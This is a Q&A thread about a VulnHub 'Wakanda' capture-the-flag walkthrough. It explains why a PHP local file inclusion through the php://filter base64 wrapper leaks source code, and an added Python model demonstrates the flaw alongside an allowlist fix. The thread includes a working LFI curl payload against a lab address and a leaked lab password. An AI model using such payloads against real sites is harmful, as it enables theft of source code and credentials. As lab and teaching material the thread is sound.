Reading through the VulnHub walkthrough for Wakanda here

https://medium.com/egghunter/wakanda-1-vulnhub-walkthrough-3d524ed8a372

It uses a PHP filter I haven't seen before (a base64 encoder), which is then decoded, using this line of code:

curl http://192.168.56.102/?lang=php://filter/convert.base64-encode/resource=index | head -n 1 | base64 -d

In comparison, I tried to simply curl the page via

curl http://192.168.56.102/?lang=php

Both output the HTML, but the filtered version also produces several lines above the DOCTYPE header that are enclosed inside a PHP tag. My question is: why does this happen?

The significant output (first few lines) is below:

<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>

Obviously this is wrong, but it seems like the filtered version is encoding, then decoding, and somehow in that process getting more information than if we just curled everything.

razeal113
  • Not sure if https://stackoverflow.com/questions/20726247/php-security-exploit-list-content-of-remote-php-file will help with more info. – Nigel Ren Oct 02 '19 at 19:34
  • The lines come from the space between the `?>` and the `<!`. – ceejayoz Oct 02 '19 at 21:01
  • This is an LFI attack; using `php://filter/convert.base64-encode/resource=./path/to/file.php` is a way to read the contents of the file, rather than PHP parsing it. The reason you don't do `include($_GET['page'].'.php')`. – Lawrence Cherone Oct 02 '19 at 21:59

1 Answer

I came across this article

https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

which explained this very well:

This forces PHP to base64 encode the file before it is used in the require statement. From this point it's a matter of then decoding the base64 string to obtain the source code for the PHP files.

So, as to why the filtered version gets all the HTML and the PHP: it's because it makes the PHP be encoded before grabbing the HTML, wrapping it all into one output string, which can then be decoded and read. Meaning as output you get both the page HTML and the PHP code from other supporting files.

razeal113
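The mechanism the answer describes, modelled as an added Python example (this is not code from the walkthrough, the question or the answer, and the file names, the toy PHP engine and the `fr`/`en` language files are assumptions). It contrasts what `include()` hands the engine for a plain path (the file is parsed and run, so only the HTML outside the tags reaches the client) with what it hands over for the `php://filter/convert.base64-encode/` wrapper (the raw bytes, base64-encoded, which contain no `<?php` tag and are therefore echoed verbatim on the first line of the response). It also shows the allowlist check that keeps the request parameter from ever reaching `include()` as a path:

```python
import base64
import re

# Constructed stand-in for the walkthrough's index.php (the source the
# question's decoded output shows) plus two language files. All names and
# contents here are assumptions made for this example.
INDEX_PHP = (
    "<?php\n"
    '$password ="Niamey4Ever227!!!" ;//I have to remember it\n'
    "\n"
    "if (isset($_GET['lang']))\n"
    "{\n"
    "include($_GET['lang'].\".php\");\n"
    "}\n"
    "\n"
    "?>\n"
    "\n"
    "\n"
    "\n"
    "<!DOCTYPE html>\n"
    '<html lang="en"><head>\n'
)
FILES = {
    "index.php": INDEX_PHP,
    "en.php": "<?php $greeting = 'Hello'; ?>\n",
    "fr.php": "<?php $greeting = 'Bonjour'; ?>\n",
}

FILTER_PREFIX = "php://filter/convert.base64-encode/resource="
# A PHP block, plus the single newline PHP swallows right after '?>'.
PHP_BLOCK = re.compile(r"<\?php.*?\?>\n?", re.DOTALL)


def run_php(source: str) -> str:
    """Toy model of the PHP engine: code inside <?php ... ?> is executed
    (the snippets here only assign variables, so they print nothing);
    everything outside the tags is sent to the client verbatim."""
    return PHP_BLOCK.sub("", source)


def php_include(path: str) -> str:
    """Model of include($path). A plain path loads and runs the file. With
    the base64 filter wrapper the stream layer hands the engine the encoded
    bytes instead; that text contains no '<?php' tag, so it is echoed as-is."""
    if path.startswith(FILTER_PREFIX):
        raw = FILES.get(path[len(FILTER_PREFIX):])
        if raw is None:
            return ""
        return run_php(base64.b64encode(raw.encode()).decode())
    source = FILES.get(path)
    if source is None:
        return ""  # real PHP emits a warning and carries on
    return run_php(source)


def render_page(lang: str) -> str:
    """Response to GET /?lang=<lang>: index.php runs its include() first,
    then emits its own HTML, exactly as in the question's output."""
    return php_include(lang + ".php") + run_php(INDEX_PHP)


def leaked_source(lang: str) -> str:
    """What `curl ... | head -n 1 | base64 -d` recovers from the response."""
    first_line = render_page(lang).split("\n", 1)[0]
    return base64.b64decode(first_line).decode()


ALLOWED_LANGS = {"en", "fr"}


def render_page_safe(lang: str) -> str:
    """Hardened variant: the parameter only selects from a fixed allowlist,
    so a stream wrapper (or any other path) never reaches include()."""
    if lang not in ALLOWED_LANGS:
        lang = "en"
    return php_include(lang + ".php") + run_php(INDEX_PHP)


if __name__ == "__main__":
    payload = FILTER_PREFIX + "index"
    print("--- ?lang=php ---")
    print(render_page("php"))
    print("--- decoded first line of ?lang=" + payload + " ---")
    print(leaked_source(payload))
    print("--- hardened handler, same parameter ---")
    print(render_page_safe(payload))
```

Running it prints the plain HTML for `?lang=php`, the full `index.php` source (password line included) decoded from the first line of the filtered response, and again only HTML from the hardened handler, because the allowlist falls back to `en` for anything it does not recognise.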